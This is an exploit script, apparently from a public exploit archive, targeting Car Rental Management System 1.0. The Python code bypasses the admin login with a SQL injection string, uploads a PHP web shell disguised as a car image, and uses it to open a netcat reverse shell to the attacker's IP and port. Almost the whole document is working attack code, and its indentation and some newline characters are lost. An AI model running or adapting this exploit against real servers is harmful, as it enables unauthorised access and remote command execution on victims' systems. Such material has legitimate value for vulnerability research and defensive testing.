Authored by Fortunato Lodari

Car Rental Management System version 1.0 remote SQL injection and shell upload exploit.

# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Date: 09-11-2020
# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Debian 10 with apache2

# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
# on the victim system
#
# on the Attacker machine you must listen with NC on a port

import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
#foxlox#



payload = {"username":"' OR 1=1 limit 1#","password":"moana"}

proxies = { "http": "http://localhost:8080"}

#payload = "username=' OR 1=1 limit 1 #&password=ciao"

def deb(str):
print("Debug => "+str)

def login():
deb("Login...")
session=requests.Session()
url = mainurl+"/admin/ajax.php?action=login"
#{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
r=session.post(url,payload, allow_redirects=False,proxies=proxies)
cookie = r.headers["Set-Cookie"]
deb(cookie)
return cookie

def find_all(a_str, sub,lbegin,lend):
start = 0
start = a_str.find(sub, start)
t=(a_str[start+lbegin:start+lend]).replace('"','')
return t


def upload(c):
deb("Getting cookie")
c = c.split("=");cookie={c[0]:c[1]}
deb("Sending payload")
filetosend=files = {'img': ('s_hell.php', '<?phpnecho system($_GET["cmd"]);n?>n')}
fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
deb("Saved Machine");
r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
mid=find_all(r.content,'data-id=',8,11)
deb("Machine id: "+mid)
r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
deb("Exploit url: "+defurl)
#os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
print("Opening url: "+exploit)
print("Don't forget to run: nc -nvlp "+sys.argv[3])
os.system(exploit)


def usage():
if len(sys.argv) < 4:
print("Create a PHPShell for Car Rental Management System")
print("example:")
print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
exit()



usage()
mainurl = sys.argv[1]
upload(login())

#fox